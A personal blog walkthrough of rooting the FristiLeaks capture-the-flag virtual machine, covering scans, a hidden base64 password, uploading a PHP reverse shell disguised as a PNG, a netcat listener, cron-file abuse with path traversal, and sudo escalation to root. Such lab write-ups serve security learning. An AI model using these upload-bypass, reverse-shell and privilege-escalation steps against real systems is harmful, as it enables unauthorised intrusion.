rooting fristi

Due to global warming, even the places I stay becoming quite hot. Yeah, I am living in Dharamsala, just beneath the Himalayan mountainous region. I feel sorry for all the people who stays in extremely hot regions or cold regions because of the global warming, therefore, I promise I will use the trash-bin well …

Ok, lets drive in..

Step 01:

nmap -sC -sV -p- -A -T4 -oN nmap.log

# Nmap 7.70 scan initiated Wed Jul 3 10:11:32 2019 as: nmap -sC -sV -p- -A -T4 -oN nmap.log
Nmap scan report for
Host is up (0.00042s latency).
Not shown: 65534 filtered ports
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Step 02:

Since the machine is running web server. Let’s browse the website.

Subsequently I used to check the source code and try to figure out if there is anything interesting. I didn’t find any but, robots.txt has a good info 🙂

I browsed all the folders and I get this image. I did try

file command 

exiftool command

I reached my wits end as this moment. Because I can’t find anything interesting. So, I admit that I had to peek other people’s walk-in just this step.

Step 03:


They had mentioned that since the name of the machine is also a drink “fristi” and they tried this.

What I did was add the word “fristi” to my dictionary as well.

Then I ran the gobuster.

gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-root.log -t 50

Step 04:


Subsequently I repeated my old steps, i.e. view source code and robots.txt checkup.

I found this one.

<!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier.  - by eezeepz -->

We got a username:  eezeepz

Secondly, when I read the meta tag section, it is using base64. There is a long encrypted file (photo) and followed by another code (which gives me a feel that the second one is the code we need and first one is just a rabbit hole). I have no logic to prove it, perhaps it is because of some intuition you get when you play some ctfs ?

Step 05:


I need to decrypt this file.

  1. vim message.txt
  2. cat message.txt | base64 -d > photo.png

Password:   keKkeKKeKKeKkEkkEk

Step 06:

Let’s try to login.


username: eezeepz

password: keKkeKKeKKeKkEkkEk

Step 07:


I am restraining myself from using The Metasploit. Therefore, I downloaded a copy of php reverse shell from pentest monkey (here); and changed the IP address and Port number. Usually, I use other binder programs through which I can bind my script with images (etc), nevertheless, I fired the burp suite to modify the file extension from php-reverse-shell.php to php-reverse-shell.php.png

You can see from the burp image, I have successfully uploaded the file and it’s in /uploads folder.

Step 08:

So before, I visit the link, I opened a nc.

nc -lvp 1234 

Once I visited the website url:

I get a reverse shell.

I got a limited shell access. Now, I need to figure out a way to escalate my privilege.

Step 09:

There are couple of users along with EZ. I found file dubbed notes.txt;

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Step 10:

By going through the notes.txt carefully (I read it more than 4 times), I was able to do the following steps.

  • cd /tmp
  • touch runthis
  • echo ‘/usr/bin/chmod 777 /home/admin/’ >> /tmp/runthis
  • echo ‘/usr/bin/chmod 777 /home/fristi/’ >> /tmp/runthis

Like it mentioned in the notes.txt, cronresult automatically appeared out of nowhere (means cronjob is running).

When I check the status of the admin folder

ls -lah /home/admin

The permission didn’t change despite I can see the execution of the chmod 777 on /home/admin/

I have to sneak the write up of other people, and what they did is,

  • echo ‘/usr/bin/../../chmod 777 /home/admin/’ >> /tmp/runthis

Step 11:

  • cd /home/admin
  • ls  -lah
  • cat whoisyourgodnow.txt

Crypted Message:


Step 11:

There is encrypting program written in python

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn

Name of the program:

import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

print cryptoResult

At this moment, I am very much sure that we need to write an decryption program. Suddenly remorse feeling draped me again for not learning scripting properly. (I need to keep this in my bucket list).

For timeline, I will borrow a program from other.

Name of the program:

import base64,codecs,sys

def decodeString(str):
rot13string = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(rot13string)

print (decodeString(sys.argv[1]))

Step 12:

python3 =RFn0AKnlMHMPIzpyuTI0ITG


Step 13:

Since I got the password, I am very excited to check whether I can do su command.

We need to spawn a shell, because the box says.. (check the photo)

  • python -c ‘import pty; pty.spawn(“/bin/sh”)’           # more scripts.
  • su fristigod
  • LetThereBeFristi!
  • ls -lah
  • cd
  • cat .bash_history

Step 14:

  • cd  .secret_admin_stuff
  • ls -lah
  • file doCom

Step 15:

sudo -l     # this command gave me the idea of usage

cd    /var/fristigod/.secret_admin_stuff/

sudo -u fristi ./doCom /bin/bash  


We got the root !! (I performed file command to check the file doCom).

Step 16:

ls    -lah /root 

cat fristileaks_secrets.txt

Yes, we got the flag: Y0u_kn0w_y)0o_l0ve_fr1st1


The machine was suppose to be cracked within 4 hours and it took more close to 12 hours. I need to work hard :( 


Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed